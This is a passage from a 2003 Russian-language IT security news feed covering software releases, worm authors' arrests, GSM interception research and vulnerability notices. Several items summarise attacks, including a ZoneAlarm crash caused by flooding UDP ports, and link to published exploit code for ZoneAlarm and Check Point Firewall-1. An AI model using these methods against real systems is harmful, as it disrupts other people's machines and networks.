С выходом новой версии Microsoft Office у пользователей данного пакета появятся более гибкие возможности управления доступом к создаваемым документам. С помощью встроенной в профессиональные версии приложений Office 2003 системы управления правами на доступ к информации (IRM), можно будет определять круг лиц, имеющих право на просмотр и изменение документа, блокировать копирование и печать файлов, а также устанавливать ограничения по сроку действия документов. Все эти возможности будут доступны компаниям, использующим Office 2003 в сочетании с сервером под управлением ОС Windows Server 2003 со службой Windows Rights Management Services. Работать с документами, защищенными с помощью IRM, можно будет только в Microsoft Office. Альтернативные офисные программы, даже с поддержкой форматов Microsoft, для этого не подойдут. Источник - http://www.compulenta.ru
8/09/2003 14:32 Вышла новая версия межсетевого экрана WatchGuard.
Компания Rainbow Technologies объявила о выходе новой версии программного обеспечения (v 5.0) от компании WatchGuard для межсетевых экранов V класса. Данная версия включает расширенные средства анализа аномальной деятельности в рамках протокола на основе использования прозрачных (прокси, функции автоматического блокирования и пересборки пакетов, а также: * Фильтры-посредники уровня приложения для протоколов HTTP и SMTP, позволяющих анализировать содержимое обрабатываемых пакетов и обнаруживать аномальное поведение в рамках протокола * Автоматическое блокирование адресов источников аномального трафика * NAT Traversal, которое позволяет инкапсулировать IPSec трафик в UDP пакеты и за счет этого передавать трафик через другие устройства, на которых реализован NAT * Поддержка работы резервного канала доступа в Интернет * Прозрачное распределение адресной информации по DHCP от удаленного сервера, что позволяет объединить в единое адресное пространство сети все удаленные офисы. Таким образом, пользователь любого брандмауэра WatchGuard V класса получает теперь, кроме стандартных функций межсетевого экрана, и функции систем класса IDS (Intrusion Detection System). Источник - http://www.cnews.ru
8/09/2003 13:46 New PHP manual.
Вышла новая версия PHP-мануала с коментариями в CHM-формате. Наверняка будет представлять интерес для Вэб-мастеров, разрабатывающих WWW-сайты при помощи популярного скриптового языка PHP. Cсылка ниже приводит список зеркал, с которых можно скачать заархивированную версию мануала. Зеркала - http://ua2.php.net/get/php_manual_chm_12.zip/from/a/mirror
8/09/2003 13:22 Недельный отчёт о вирусах Panda Software.
Вышел очередной недельный отчёт о вирусах антивирусной компании Panda Software. В отчёте описываются следующие черви: Blaster.F, Mapson.D, Darby.A, Apdoor.B, Daol.A и Surfbar. Подробности - http://www.viruslab.ru/press/index.php?go=show&num=187
8/09/2003 13:18 Хакер, взломавший Yahoo и Google, готов сдаться властям.
22-летний житель США Эдриан Ламо, разыскиваемый властями США за совершение нескольких хакерских атак, в интервью агентству Reuters заявил о своем намерении сдаться правосудию. Среди объектов, взломанных Ламо, оказалась корпоративная сеть газеты The New York Times, а также сайты Yahoo и Google. Ламо отметил, что взламывал сайты не для того, чтобы показать их владельцам слабые места в системе безопасности: "Я не считаю себя неким белым рыцарем, стремящимся помочь компаниям. Я лишь оказывался в нужное время в нужном месте". Хакер отметил, что намерен обратиться за помощью к государственным защитникам. Подробности - http://story.news.yahoo.com/news?tmpl=...
8/09/2003 12:36 Утверждён стандарт беспроводной связи 802.15.4.
Международная организация IEEE (Institute of Electrical and Electronic Engineers), занимающаяся выработкой промышленных стандартов для электронной техники, утвердила спецификации протокола беспроводной связи IEEE 802.15.4. Этот стандарт описывает взаимодействие таких устройств, как сенсоры, сервоприводы, электронные метки, радиофицированные игрушки и пр. Новый стандарт предусматривает небольшую дальность действия (около 10 метров) и низкую пропускную способность канала - до 250 кбит/с. Передача на этой скорости ведётся в диапазоне 2,4 ГГц. Никая мощность и скорость обусловлены малыми энергоресурсами связываемых устройств. Доступны также диапазоны 858 МГц (20 кбит/с) и 902-928 МГц (40 кбит/с), все три полосы частот свободны от лицензирования. Стандарт 802.15.4, получивший жаргонное наименование ZigBee, обеспечивает возможность связи и на расстояниях свыше 10 метров. Если в пределах досягаемости ZigBee-устройства окажется оборудование Wi-Fi или Bluetooth, их каналы могут использоваться как туннель для трафика ZigBee. Источник - http://www.compulenta.ru
8/09/2003 12:14 Бета-тестирование нового варианта Windows Update.
Интернет-издание Neowin сообщило, что компания Microsoft готовится начать бета-тестирование новой версии службы Windows Update, через которую может производиться автоматизированная установка обновлений и заплаток к программным продуктам компании. Windows Update V5 станет шагом по созданию единой системы обновления ПО производства Microsoft (в настоящее время для обновления различных семейств продуктов Microsoft служат самостоятельные системы). Ожидается, что в пятой версии службы будут поддерживаться продукты линеек Windows, Office, SQL Server и Exchange. Подробнее об участии в тестировании можно узнать на сайте Microsoft Betaplace. Подробности - http://www.neowin.net/comments.php?id=13414&category=main
7/09/2003 13:25 Японцы протестуют против внедрения национальной идентификационной системы.
Ровно год назад в Японии была создана и задействована общенациональная компьютеризированная идентификационная система Juki Net. Она базируется на состоящем из 11 цифр индивидуальном номере каждого жителя страны, а также содержит базу некоторых личных данных: адрес, дату рождения и пол всех подданных Японии. Система задумывалась как средство ускорения всевозможных административных процедур. До недавнего времени сеть использовалась исключительно сотрудниками правительственных учреждений, однако несколько дней назад основная часть содержащейся в ней информации стала доступна местным властям и отдельным лицам. В настоящее время руководители городов, префектур и отдельных районов уже выпускают идентификационные карты Juki Net. Однако далеко не все японцы довольны нововведением. В настоящее время инициативная группа жителей Японских островов пытается найти юридическое обоснование для прекращения работы сети. Активисты борьбы с Juki Net утверждают, что использование новой системы нарушает конституционные права японцев. По их словам, совершенно очевидно, что сеть позволяет вести слежку за людьми, наподобие той, которая осуществлялась авторитарным правительством Японии перед Второй мировой войной. Источник - http://www.compulenta.ru
7/09/2003 13:17 Способы хищений в банковских информационно-вычислительных системах.
На сайте crime-research.ru опубликована довольно любопытная статья кандидата юридических наук, доцента Натальи Ахтырской под заголовком "Способы хищений в банковских информационно-вычислительных системах". Естественно, автор, в силу специфики своей профессии, не описывает технические способы проникновения в банковские ИВС, однако, основные методы и способы хищения денежных средств в банковских ИВС в статье описаны. Статья - http://www.crime-research.ru/library/Akhtirsk0803.html
7/09/2003 13:06 Фирма обещает универсальную операционную систему.
Два изобретателя из Сингапура утверждают, что они создали операционную систему, способную выполнять программы для Windows, Linux и Palm, и обещают официально представить свой продукт в этом месяце. Анонс задержался почти на год из-за трудностей с поиском инвесторов и добавления «важных новых возможностей», сказал Р. Чандра, директор компании, название которой за это время сменилось с Intramedia на Radixs. «Нашей главной проблемой был неблагоприятный инвестиционный климат. Мы занялись бизнесом, о котором в Сингапуре и в Азии никто не хотел слышать», — пояснил он. Однако теперь, когда финансирование найдено, компания заключила соглашения с производителями карманных ПК и мобильными операторами о коммерческом внедрении услуг беспроводной связи на своей платформе, которое состоится в конце этого года. Чандра отказался назвать этих производителей и операторов, приберегая эту информацию для официальной презентации на выставке Demomobile 2003 в Калифорнии. Операционная система MXI позволяет исполнять программы для Windows, Linux или Palm. Она осуществляет сложную эмуляцию, благодаря которой программы исполняются так же быстро и гладко, как на «родной» ОС, утверждает Radixs. Второй элемент платформы работает на карманных ПК, оборудованных средствами беспроводной связи. При этом большая часть программы, запущенной пользователем КПК, исполняется на сервере MXI. В устройство передаются только те данные, которые необходимы пользователю для работы с документом. Сам документ — текстовой файл, электронная таблица или изображение — хранится на сервере. Таким образом, даже маломощные устройства могут работать с ресурсоемкими настольными программами, утверждает главный технолог Radixs Сэм Хонг Подробности - http://www.zdnet.ru/?ID=306084
7/09/2003 12:18 Антивирус и межсетевой экран в одном флаконе.
Для борьбы с угрозой «смешанных» вирусных атак — таких, как MSBlast, — секьюрити-компания F-Secure предложила комбинированный продукт: антивирус и межсетевой экран (firewall). Пакет F-Secure Anti Virus Client Security предназначен для борьбы с новым видом интернет-угроз, сочетающих характеристики вируса, червя или троянского коня с использованием уязвимости самой системы. По словам менеджера F-Secure в Британии Джейсона Холловея, «раз хакеры начали осваивать методы писателей вирусов, а в вирусах применяются хакерские технологии... то требуется комбинированное решение». Холловей утверждает, что один интегрированный пакет email/firewall гораздо эффективнее двух отдельных пакетов: «Как показала эпидемия MSBlast, если червь остается в памяти, он может достаточно быстро распространиться по сети, так как традиционные антивирусные решения бессильны до тех пор, пока что-нибудь не появится на жестком диске, — а к тому времени может быть уже слишком поздно». Он отметил также, что комбинированный пакет способен гораздо эффективнее сканировать трафик e-mail. Вместо того, чтобы отводить почтовые сообщения через прокси-сервер, новый продукт сканирует входящие и исходящие пакеты на входе рабочей станции, выявляя трафик e-mail, который затем проверяется на вирусы. Подробнее - http://news.zdnet.co.uk/internet/security/0,39020375,39116100,00.htm
7/09/2003 12:07 Открыт экспертный портал по IP-телефонии.
Как сообщает runet.ru, в рамках сообщества экспертов Report.ru открыт юбилейный 100-й портал. Он посвящен вопросам нового вида коммуникаций, набирающего все большую популярность в России. Report.ru – это сообщество экспертов из разных стран и регионов России, участником которого может стать каждый. Проект существует с 2000 года. Сегодня Report.ru – это 100 активно развивающихся тематических порталов, объединенных в 12 рубриках каталога, поддержкой и развитием которых занимаются 75 экспертов и 6 менеджеров проекта. Сотый по счету экспертный раздел стартовал 3 сентября. Проект посвящен всем аспектам IP-телефонии, начиная от выбора оператора, и заканчивая новостями по данной теме. Экспертом раздела выступает Сергей Соломин. На момент написания данного материала на портале IP-телефонии, было опубликовано более 50 разных статей, посвященных выше указанной теме. Адрес портала - http://iptelephony.report.ru/
6/09/2003 15:54 ПО для борьбы с вирусами окончательно проиграло битву с онлайновой заразой.
Аналитики пришли к выводу, что в 2003 году компании-производители ПО для борьбы с вирусами окончательно проиграли битву с онлайновой заразой. Показатель эффективности работы антивирусов весьма прозрачен - количество зараженных компьютеров в мире, число которых в 2003 году, в том числе и благодаря последним MSBlast и SoBig.F превысило всяческие границы. В случае с Sobig.F и его скоростями антивирусы просто не поспевают за ними - они срабатывают, когда основной вред уже нанесен. А эксперты уже говорят о грядущем нашествии еще более разрушительных и быстрых вирусов. Называются два типа вирусов: Flash Worm, который может заразить целую компьютерную сеть за 15 секунд, и Warhol Worm, которому хватит 15 минут для того, чтобы все компьютеры в мире, подключенные к Интернету, оказались зараженными. Источник - http://www.securitylab.ru
6/09/2003 15:37 Учебник по PostgreSQL.
На сайте citforum выложен перевод Виктора Вислобокова учебника по популярной СУБД PostreSQL версии 7.3.3, написанного группой разработчиков этой СУБД. Подробнее - http://www.citforum.ru/database/postgresql/
6/09/2003 15:34 США впервые применили закон "О предоставлении достоверных сведений при создании доменных имен".
Полиция США задержала жителя штата Нью-Йорка, подозреваемого в привлечении детей к просмотру порнографических сайтов методом создания ложных доменных имен, сообщает CNET News.com. Арест Джона Зуккарини стал первым случаем применения на практике принятого в апреле закона "О предоставлении достоверных сведений при создании доменных имен". Указанный закон предусматривает наказание за создание ложных доменных имен, под которыми владельцы сайтов скрывают порнографические материалы. Зуккарини инкриминируют регистрацию более 3 тысяч фальшивых интернет-адресов вроде dinseyland.com, способствующих обманному привлечению детей на порносайты. По информации полиции, за свою деятельность подозреваемый получал около 1 миллиона ежегодно. "Обвиняемому инкриминируется использование в корыстных целях распространенных детских заблуждений и получение прибыли за счет привлечения детей к наиболее отвратительным частям киберпространства. Умышленные действия Зуккарини трактуются как преступные", - гласит текст заявления прокурора. Если суд признает вину создателя поддельных доменных имен, то по новому закону ему грозят 4 года пребывания в тюрьме и штраф 250 тысяч долларов. Несмотря на заведомо преступный характер деятельности Зуккарини, многие эксперты полагают, что дальнейшее применение закона "О предоставлении достоверных сведений при создании доменных имен" может быть сопряжено с проблемами, касающимися свободы слова. Источник - http://www.viruslist.ru
6/09/2003 11:30 За Тони Блэром охотится критически настроенный электронный червь.
Премьер-министр Великобритании Тони Блэр и официальный сайт его резиденции на Даунинг Стрит, 10 стали объектом "нападения" нового компьютерного вируса Quaters. Как сообщается на сайте BBC News, вирус распространяется через программы обмена электронной почтой и системы "чатов". Quaters поражает только компьютеры, использующие операционную систему Windows. Эксперты по электронной безопасности оценивают вредоносность электронного червя, как незначительную. Основным симптомом заражения компьютера считается появление на мониторе критических замечаний в адрес британского премьера. Одно из них, в частности, обвиняет Блэра в растрате налогов на содержание нелегальных иммигрантов и сокращении расходов на социальные нужды. В конце обвинительного трактата главе британского правительства предлагается "хорошенько подумать, поскольку от этого зависит его карьера". Также вирус может переписывать некоторые файлы, добавляя в них текст следующего содержания: "Infected by the WIN32.SORT-IT-OUT-BLAIR Virus!", и препятствовать загрузке официального сайта премьера. Подробнее - http://news.bbc.co.uk/1/hi/technology/3083192.stm
6/09/2003 10:26 В Рунете стартовал литературный конкурс "Убей центр американского английского".
Интернет-журнал "Самиздат" в пятницу начал проведение анонимного тематического конкурса трэшевого рассказа "Паразиты мозга". Согласно заявлению организаторов, "конкурс не преследует никаких коммерческих целей и предназначен для развлечения почтеннейшей публики текстами в жанре "трэш". Этот жанр (от английского слова trash - мусор, отбросы) описывается как жанр "бесхитростный, бездумный, безыдейный, свободный от рефлексии, контекста, этики, морали, здравого смысла". Кроме того, по словам организаторов, "трэш - прежде всего текст авантюрного содержания", которому следует "обладать признаками индивидуального стиля, халтура не приветствуется". Тема конкурса - спам. По утверждению организаторов, "спам является одним из образчиков трэш-культуры. Поэтому, как поясняют устроители, "глобальная тема конкурса - спам во всех его проявлениях. Локальная тема - «Убей 'Центр Американского Английского Языка'!»" "Вы можете писать о чём угодно и как угодно, но сочетание слов «Убей 'Центр Американского Английского Языка'!» должно быть обязательно", - сообщают организаторы на сайте мероприятия. Сроки написания и размещения работ после объявления темы - с 14:00 5.09.2003 по 12:00 9.09.2003. Подробности - http://zhurnal.lib.ru/t/treshkonkurs/
5/09/2003 15:35 Эблема для BlackCat Linux.
В качестве шутки для разрядки после напряжённой трудовой недели - вашему вниманию предлагается эмблема для дистрибутива BlackCat Linux. Эмблема взята с сайта www.voffka.com. :))) Эмблема - http://voffka.com/archives/blackcat.jpg
5/09/2003 14:49 Американские университеты отключают от интернета для борьбы с вирусами.
Как сообщает газета Washington Post, системные адимнистраторы Университета Джорджа Мэйсона (Фэрфакс, Вирджиния, США) отключили доступ в интернет всем 3600 студентам, живущим на территории студенческого городка. Как выяснилось, отключение доступа к сети произведено в целях борьбы с распространением компьютерных вирусов. В этом американском учебном заведении принимаются серьезные меры для защиты от вредоносных программ. Все студенты университета должны в обязательном порядке представить свой настольный компьютер или ноутбук для проверки специалисту по безопасности. Кроме того, студентам выдают дистрибутивы антивирусного ПО и проверяют, было ли оно установлено или нет. Несмотря на все принятые меры, компьютеры некоторых студентов, избежавших проверки, стали источниками распространения вирусов. Руководство учебного заведения пообещало подключить университетские общежития к сети, после того как будут выявлены все зараженные компьютеры. Подробности - http://www.washingtonpost.com/wp-dyn/articles/A25845-2003Sep4.html
5/09/2003 14:06 Обновленные версии Dr.Web 4.30a.
Вышли исправления антивирусной программы Dr.Web для Windows, OS/2 и Novell NetWare. В графической версии сканера Dr.Web исправлена обработка параметра * командной строки. В SpIDer Mail для Windows реализовано корректное обнаружение сеансов работы по защищенным соединениям SSL/TLS (проверка почты в этих случаях не производится), добавлена проверка правильности перехвата всех транспортных протоколов при каждом запуске SpIDer Mail, обеспечена совместимость с программным обеспечением Netlimiter, реализовано обнаружение ряда несовместимых со SpIDer Mail программ (Netsonic, SpamSubtractor), устранен эффект зависания системы при загрузке в конфигурациях с установленным Microsoft Proxy Client. В SpIDer Guard для Windows 95/98/Me исправлено определение по формату некоторых типов файлов. В SpIDer Guard для Windows NT/2000/XP исправлена ошибка при работе в Windows NT4, ускорен алгоритм обработки файлов. В консольной версии сканера Dr.Web для OS/2 исправлена ошибка работы со стеком. В версии Dr.Web для Novell NetWare исправлена ошибка сохранения в конфигурационном файле списка адресов получателей уведомлений, ликвидирована ошибка, приводившаая к утечке памяти. Подробности - http://www.drweb.ru
5/09/2003 13:16 Эксплоит уязвимости ZoneAlarm.
Некто warlord из группы исследователей компьютерной безопасности nologin опубликовал исходный код для Linux, позволяющий удалённо заваливать машины, доступ к которым контролируется персоннал файрволлом ZoneAlarm (об уязвимости в ZoneAlarm мы сообщали вчера). Работа эксплоита, как утверждает автор, проверена на ОС Win98, в том числе SE. Эксплоит - http://www.nologin.org/main.pl?action=codeView&codeId=39&
5/09/2003 11:31 Построение защищенного почтового сервера на базе FreeBSD и Postfix.
На opennet.ru опубликован анонс 2-х статей разных авторов по сходной тематике - замена sendmail на postfix в FreeBSD и увеличение безопасности почтового сервера : - Postfix: A Secure and Easy-to-Use MTA - установка и настройка Postfix (с виртуальными почтовыми доменами); - Building a Fairly secure FreeBSD Mail server - объемное руководство, кроме непосредственного описания замены sendmail на postfix и настройки системы борьбы со спамом и вирусами, присутствует обширный материал с рассказом как установить FreeBSD, оптимизировать настройки, увеличить безопасность, обновить систему через cvsup и пересобрать из исходных текстов, затронут процесс настройки фаервола, проведен ликбез по поводу прав доступа в Unix. Первая статья - http://www.onlamp.com/lpt/a/4099 Вторая статья - http://screamingelectron.org/phpBB2/viewtopic.php?t=774
5/09/2003 11:18 Gentoo BSD.
Как сообщает Fiodor Sorex на linuxRSP.ru, все, кто хотел видеть у себя систему Gentoo, но с ядром не Linux, а BSD, и утилитами из BSD дождались своего часа. Работы по осуществлению этого замысла уже ведутся. А пока, можно использовать текущие ветки OpenBSD и FreeBSD. Подробнее - http://dev.gentoo.org/~g2boojum/
5/09/2003 10:53 Шестая версия Eudora фильтрует спам.
Сегодня Qualcomm, один из крупнейших поставщиков беспроводных решений и технологий пересылки сообщений для интернета, представил коммерческий релиз шестой версии почтового клиента Eudora. В новом релизе популярной программы для пользователей ОС Windows и Macintosh заметно прибавилось новых функций, в числе которых защита от спама, автоматическое форматирование текста и организация входящих сообщений с помощью закладок. Как обычно, новую версию можно сгрузить с сайта eudora.com в бесплатном и коммерческом варианте. «У Eudora имеется серьезная репутация среди как частных, так и корпоративных пользователей. Новая версия поднимает ее на гораздо большую высоту», - во время объявления продукта заявил вице-президент подразделения Qualcomm Eudora Product Уильям Ганон (William Ganon). По его мнению, проблема спама – это один из главнейших вопросов, встающих на сегодня перед активным пользователем интернета. В новой версии множество новых функций, но против спама непосредственно направлены две из них: это SpamWatch и Content Concentrator. Первая из них доступна только в платной версии и автоматически отсеивает ненужные сообщения. Она поставляется готовой к использованию без дополнительной настройки и отсеивает большинство ненужной почты. Помимо этого, Eudora 6.0 может помочь пользователю в сортировке уже удаленного спама, в поисках нужных писем. Отсортировав ненужную почту, программа присваивает всем письмам определенные индекс «junk score», который характеризует «уверенность» программы в том, что в этом письме содержится спам. Помимо этого, в случае, если нежелательной почте удалось прорваться сквозь фильтр, достаточно обозначить его как спам, и программа занесет его основные особенности в свой список критериев спама. Источник - http://www.cnews.ru
5/09/2003 10:39 Румынская полиция опровергает информацию об аресте создателя червя Blaster.F.
Румынская полиция отрицает появившиеся ранее сообщения об аресте подозреваемого в создании румынской вариации червя Blaster, названной Blaster.F. Напомним, что ранее сообщалось об аресте 24-летнего Дана Думитру Чобану - выпускника Ясского технического университета. Однако представитель местной полиции Мариус Тахе сообщил агентству AP, что никакого ареста не проводилось. Полиция действительно ведет расследование по факту создания червя, и по этому делу есть подозреваемый, имя которого Тахе назвать отказался, ссылаясь на интересы следствия. По словам же представителя компании BitDefender, которая первой обнаружила Blaster.F, полиция действительно арестовала Чобану, но затем отпустила его за недостатком доказательств. Подробнее - http://story.news.yahoo.com/news?...
5/09/2003 10:23 Серьезная дыра в стандарте GSM.
Исследователи из Технического института Хайфы (Израиль) обнаружили новую дыру в стандарте сотовой связи GSM, в котором работают около 70% всех сотовых сетей в мире. Дыру обнаружили профессор Эли Бихам и его аспирант Элад Баркан, причем, по их мнению, дыра носит фундаментальный характер. Все дело в том, что при разработке стандарта связи коррекции шума и помех был отдан более высокий приоритет по сравнению с шифрованием сигнала, поэтому существует принципиальная возможность перехвата сигнала до того, как он будет зашифрован. Метод осуществления такого перехвата и предложили исследователи. По мнению израильских специалистов, обнаруженная дыра представляет собой серьезную угрозу. В будущем они намерены запатентовать свои разработки и сделать так, чтобы они были доступны исключительно правоохранительным органам и спецслужбам. Для таких ведомств, впрочем, перехват переговоров в сетях GSM не является неразрешимой задачей. Системы прослушивания разговоров существуют уже достаточно долгое время, однако стоят очень дорого - от 250 тысяч долларов США и более. В Ассоциации GSM признали существование проблемы, обнаруженной израильскими учеными. Однако в ассоциации полагают, что практическая реализация прослушивания по новому методу сопряжена со значительными трудностями. В официальном заявлении организации говорится, что в исследовании израильских специалистов "нет ничего принципиально нового для сообщества GSM" и выражается уверенность в том, что на практике применение метода будет связано со значительными ограничениями. Источник - http://www.compulenta.ru
4/09/2003 21:13 Уязвимость ZoneAlarm.
Команда Hackologyteam сообшила об обнаружении уязвимости в популярном персональном файрволле для Win - ссистем ZoneAlarm. Используя эту уязвимость, удалённый атакующий может вызвать отказ функционирования ZoneAlarm при помощи зафлйживания UDP-портов. В частности, достаточно посылать пакеты на UDP-порты в диапазоне 0 - 65000 для завешивания машины под управлением ZoneAlarm. Уязвимость обнаружена в Zone Labs ZoneAlarm 3.7.202 и Zone Labs ZoneAlarm Pro 4.0. В описании уязвимости приводится код эксплоита на Перл. Подробности - http://www.securityfocus.com/archive/1/335830/2003-08-30/2003-09-05/0
4/09/2003 20:07 Уязвимость в Movie Player.
Сообщается о наличии уязвимости в популярном в ОС Linux медиа-плеере Movie Player, он же Mplayer версии 0.91. При задании в качестве имени файла длинного имени происходит переполнение буфера с дальнейшим падениям Медиа-плеера. Подробности - http://www.nosystem.com.ar/advisories/advisory-02.txt
4/09/2003 20:03 Интернет-червь Slammer парализовал работу АЭС в США.
Причиной произошедшего в январе этого года отключения двух ключевых компьютерных систем атомной электростанции Дэвис-Бэсс, расположенной в американском штате Огайо, стал интернет-червь Helkern (Slammer). К такому выводу пришли специалисты Комисии по ядерному надзору, сообщает Associated Press. Проведя тщательное расследование, федеральные инспекторы обнаружили серьезные нарушения в работе компании FirstEnergy Nuclear, занимавшейся аппаратным и программным обеспечением АЭС. В результате сеть Дэвис-Бэсс была подключена без надлежащих мер предосторожности, что привело к проникновению в нее вируса Helkern и выходу из строя систем наблюдения за параметрами безопасности и обеспечения технологического процесса. Кроме того, FirstEnergy Nuclear не установила заплатку, ликвидирующую брешь в системе безопасности Microsoft SQL Server. В свою очередь представители FirstEnergy Nuclear заявили, что они тщательно фиксируют все внешние соединения своей сети, устанавливают дополнительные программы для обеспечения безопасности и обращают особое внимание своих сотрудников на необходимость устранения брешей. Подробности - http://www.viruslist.com/click?_URL=http://www.boston.com/news/nation/washington/articles/...
4/09/2003 19:49 Бета-тестирование сервис-пака для Windows Server 2003.
По информации сайта Bink.nu, в ближайшие недели компания Microsoft начнет бета-тестирование первого пакета обновлений для операционной системы Windows Server 2003, выпущенной на рынок весной нынешнего года. Помимо исправления обнаруженных дыр и ошибок, в сервис-пак войдут несколько принципиальных обновлений, связанных с использованием 64-разрядных процессоров. Во-первых, в сервис-паке должна быть реализована поддержка 64-разрядной системы команд процессоров AMD Opteron и Athlon 64. Во-вторых, с выходом сервис-пака процессоры Itanium будут поддерживаться и стандартной версией системы, а не только редакциями Enterprise и Datacenter. Наконец, в сервис-паке будет реализована технология IA-32 Execution Layer, позволяющая значительно повысить производительность чипов Itanium в 32-разрядных приложениях. Выход сервис-пака намечен на начало 2004 года. Подробнее - http://winxp.bink.nu/BinkPortal/DesktopModules/ArticleDetail.aspx?ArticleID=29
4/09/2003 18:41 Опасные дыры в Microsoft Office и Visual Basic for Applications.
Компания Microsoft выпустила пять новых бюллетеней безопасности, посвященных новым дырам в своих продуктах. При этом, если чаще всего в подобных документах описываются дыры в Windows и Internet Explorer, то на этот раз большинство дыр обнаружены в продуктах серии Microsoft Office. В Windows найдена лишь одна дыра, описанная в бюллетене MS03-34 и получившая низкий рейтинг опасности. Суть дыры сводится к тому, что из-за уязвимости в реализации протокола NetBIOS злоумышленник может прочитать случайные фрагменты памяти на атакуемой машине. Поскольку управлять чтением памяти для хакера невозможно, риск разглашения важной информации минимален. Наиболее серьезной является дыра в Visual Basic for Applications (VBA) - системе программирования, встраиваемой Microsoft, а также некоторыми другими компаниями, в свои приложения. В частности, VBA имеется во всех версиях MS Office, начиная с Office 97. Смысл критической уязвимости, описанной в бюллетене MS03-037, сводится к возникновению ошибки переполнения буфера при передаче VBA параметров открываемого документа. Используя переполнение буфера, хакер может выполнить в системе произвольный код. Для проведения атаки ему необходимо передать пользователю атакуемой системы документ, созданный приложением, использующим VBA. Для успешной атаки достаточно, чтобы пользователь открыл такой документ. Дыра имеется в Microsoft Visual Basic for Applications SDK версий 5.0, 6.0, 6.1 и 6.2. Эти версии VBA входят в состав различных версий Microsoft Office, пакетов Works, Project, Publisher и Visio, а также в ПО для малого и среднего бизнеса серий Great Plains, Dynamics, eEnterprise и Solomon. Во всех случаях дыра носит критический характер и требует немедленной установки соответствующих патчей. Более подробно - http://www.compulenta.ru/2003/9/4/41752/
4/09/2003 18:07 Российские IT-компании создали Национальную коалицию против спама.
В среду компании Mail.Ru, Microsoft, Rambler, Subscribe.Ru, "Ашманов и партнеры", "Голден Телеком" и "Лаборатория Касперского" объявили о создании Национальной коалиции против спама. Создатели коалиции утверждают, что спам (незапрошенные рассылки по электронной почте) является серьезной проблемой для пользователей Интернета, провайдеров и владельцев сетевых служб. По мнению создателей, спам снижает качество услуг, оказываемых пользователям Интернета, нарушает конституционные права на неприкосновенность частной жизни, являясь этической проблемой, кроме того, спамеры нарушают российское законодательство о рекламе, уклоняясь от выполнения требований, предъявляемых Законом к рекламной деятельности. Участники коалиции считают, что с этим явлением необходимо бороться совместными усилиями на всех уровнях. Согласно интернет-опросу, проведенному компанией Rambler, большинство респондентов считают спам безусловным злом и нежелательным вторжением в личную жизнь. В настоящее время Национальная коалиция против спама является неформальным объединением без образования юридического лица. Коалиция открыта для вступления новых членов. Цель нового объединения - выработка правовых и технологических решений для борьбы со спамом, проведение просветительской работы, правовое преследование спамеров. Участники коалиции намереваются работать с государственными органами, проводят аудит существующего законодательства на предмет определения юридических методов борьбы со спамерами, а также разрабатывают программное обеспечение для фильтрации незапрошенных писем. 24-25 сентября в Москве в гостинице "Космос" организаторы коалиции будут проводить Первую национальную конференцию "Проблема спама и её решения". Подробности - http://www.spamtest.ru/coalition.html
4/09/2003 17:34 Румынская полиция задержала автора f-версии червя LoveSan.
В Румынии по подозрению в создании f-версии интернет-червя LoveSan (Blaster) арестован 24-летний Дан Чиобану, сообщает IDG News со ссылкой на румынских производителей антивирусного программного обеспечения, компанию Softwin SRL. Именно с помощью специалистов Softwin SRL правоохранительные органы сумели выйти на след подозреваемого в создании очередной версии червя, заразившего по всему миру свыше 500 тысяч компьютеров. Задержали Чиобану в тот момент, когда он находился в фотолаборатории. Как и в случае с 18-летним жителем Миннесоты Джеффри Парсоном, аресту румынского вирусописателя посодействовала его собственная беспечность. Создавая f-версию LoveSan, Чиобану включил в нее свой онлайн-псевдоним enbiei, что и стало главной уликой против него. В коде вируса содержалось также едкое замечание в адрес университета, в котором учился подозреваемый. Досталось от автора вируса и одному из его преподавателей. Оскорбительные послания были написаны на румынском языке. В случае признания задержанного виновным, по новым румынским законам ему грозит лишение сводобы на срок до 15 лет. Подробности - http://www.infoworld.com/article/03/09/03/HNromaniannabbed_1.html
3/09/2003 23:19 Возможность переполнения буфера в Exim.
Nick Cleaton сообщил о существовании возможности удалённого переполнения буфера в куче в популярной почтовой программе - MTA Exim, выпускаемой Кембриджским университетом. Однако, как пишет сам автор, возможность этого переполнения очень ограничена, равно как и возможность выполнения произвольного кода в системе и зависит от многих условий. Тем не менее, выпущена версия Exim 4.21, на которую и рекомендуют перейти всем системным администраторам. Подробности - http://www.exim.org/pipermail/exim-announce/2003q3/000094.html
3/09/2003 23:10 Уязвимость SMC7004VBR.
Alexander Muller cообщил об уязвимости в SMC7004VBR - платформенно-независимом многофункциональном роутере, применяемом в кабельных/DSL-cетях. Заключается она в том, что в дефолтной конфигурации у удалённого злоумышленника появляется возможность доступа к критической информации, к которой можно отнести имя пользователя и его пароль. Подробности - http://www.securityfocus.com/archive/1/335807/2003-08-30/2003-09-05/0
3/09/2003 23:06 Эксплоит уязвимости Check Point Firewall-1.
22 августа была обнаружена уязвимости в ПО Check Point Firewall-1 версий 4.0, 4.1 (до SP5), использование которой позволяет вычислить внутренний IP-адрес файрволла, подключившись к потрам 256 или 264. Опубликован эксплоит, позволяющий выполнить это при помощи простой программы. Эксплоит - http://securityfocus.com/data/vulnerabilities/exploits/getints.c
3/09/2003 23:06 Эксплоит уязвимости Check Point Firewall-1.
22 августа была обнаружена уязвимости в ПО Check Point Firewall-1 версий 4.0, 4.1 (до SP5), использование которой позволяет вычислить внутренний IP-адрес файрволла, подключившись к потрам 256 или 264. Опубликован эксплоит, позволяющий выполнить это при помощи простой программы. Эксплоит - http://securityfocus.com/data/vulnerabilities/exploits/getints.c
3/09/2003 20:02 Наиболее важные уязвимости августа.
Компания Sintelli, выпускающая список рассылки уязвимостей в различном ПО при помощи Steve Christey из CVS (http://cve.mite.org) выпустила документ в формате PDF, В котором описаны наиболее важные уязвимости, обнаруженные в ПО в течение августа 2003 г. Список - http://www.sintelli.com/riskindex/aug2003.pdf
3/09/2003 14:33 Новый русскоязычный майл-лист для пользователей FreeBSD
На Opennet.ru открыт мэйл-лист для русскоязычных пользователей (и администраторов:))FreeBSD. Подробнее:http://www.opennet.ru/opennews/art.shtml?num=2822
3/09/2003 13:21 Хакеры атаковали крупнейшие американские хостинговые компании.
